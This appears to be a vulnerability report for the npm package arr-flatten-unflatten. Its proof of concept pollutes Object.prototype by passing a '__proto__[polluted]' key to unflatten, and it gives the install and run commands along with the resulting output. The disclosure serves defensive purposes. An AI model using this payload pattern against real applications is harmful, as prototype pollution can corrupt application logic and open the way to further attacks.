Prototype Pollution in quernest/arr-flatten-unflatten
Valid
Reported on
Jan 10th 2021
Description
arr-flatten-unflatten
is vulnerable to Prototype Pollution
.
Proof of Concept
- Create the following PoC file:
// poc.js
var arrFlattenUnflatten = require("arr-flatten-unflatten")
console.log("Before : " + {}.polluted);
arrFlattenUnflatten.unflatten({'__proto__[polluted]': 'Yes! Its Polluted'});
console.log("After : " + {}.polluted);
- Execute the following commands in terminal:
npm i arr-flatten-unflatten # Install affected module
node poc.js # Run the PoC
- Check the Output:
Before : undefined
After : Yes! Its Polluted
to join this conversation